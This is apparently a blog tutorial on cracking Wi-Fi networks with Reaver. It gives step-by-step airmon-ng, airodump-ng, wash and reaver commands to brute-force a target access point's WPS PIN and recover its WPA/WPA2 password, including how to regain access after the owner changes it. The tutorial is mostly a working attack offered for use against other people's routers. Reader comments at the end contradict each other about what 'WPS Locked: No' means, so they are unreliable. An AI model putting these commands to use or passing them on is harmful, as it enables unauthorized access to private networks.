Reaver
What is reaver?
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
How do i use this tool?
As said above, just follow this tutorial :)
NOTE: Reaver doesn't need any Dictionary files!
First, type:
Quote:airmon-ng
As said earlier, this shows you, your wireless card name.
I'll use wlan0
We need to set it the wireless card on monitor mode, so type:
Quote:airmon-ng start wlan0
After that, type:
Quote:airodump-ng mon0
Spoiler (Click to Hide)
![[Image: xIHlA.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vU0BXTrUIkc4ZH6O38DKBp5NZ-AU4ZODV1w7HJ8UUVWZTRIso5mtzTPu75UbbXSkGBLf4PFE2qqTCC8QRcs34=s0-d)
Now, copy the BSSID of the target AP.
Press CONTROL+c to cancel
To see the AP's that are vulnerable to WPS attacks, type:
Quote:wash -i mon0
If the target AP is vulnerable, it should say:
Quote:WPS Locked: No
Spoiler (Click to Hide)
![[Image: QK6DD.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uXFi9ov4Dx40vFocfI4A4aJtOW1aMyzaGtw8nEwQSKZATZPztDxBvlfHIqTWUZiALeZKDZrQGwVzq5gDuUIcg=s0-d)
Now, to start the attack, type:
Quote:reaver -i mon0 -b [BSSID] -vv
Spoiler (Click to Hide)
![[Image: VhpkO.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tfGvMCCl_795yhgjUkjqPHqtTiPclkCofrzsjQj6seAdl9s2lLC3BciSvcSzOdzb4X1jB6cjJVTVGXZfhgT5Q=s0-d)
Now, you'll need to wait around 2-10 hours.
If the AP is limiting you with a message saying:
Quote:[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying
AND
If reaver says that it is trying the same pin, over and over, press CONTROL+c to cancel, then type:
Quote:reaver --help
This will show you the help menu, you can start playing with the options that you have.
I usually add the: -c -S -L
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv
This one works great for me, so keep playing with the options untill it works!
When it reaches 100% it should give you some lines, the password is the one after:
Quote:WPS PSK: 'PASSWORD HERE'
And here it is!
You should also, remember the PIN.
Quote:WPS PIN: PIN HERE
Now, let's say for some reason, the router's owner changed the password for his WiFi.
Since you already have the pin, type:
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv
And it should give you the password in a matter of seconds!
Great Tutorial thanks for sharing .
ReplyDeleteI was confused whether WPS locked no . means vulnerable or no and you cleared it up .
no mean its not vulnerable.
Deleteno mean its not vulnerable.
ReplyDelete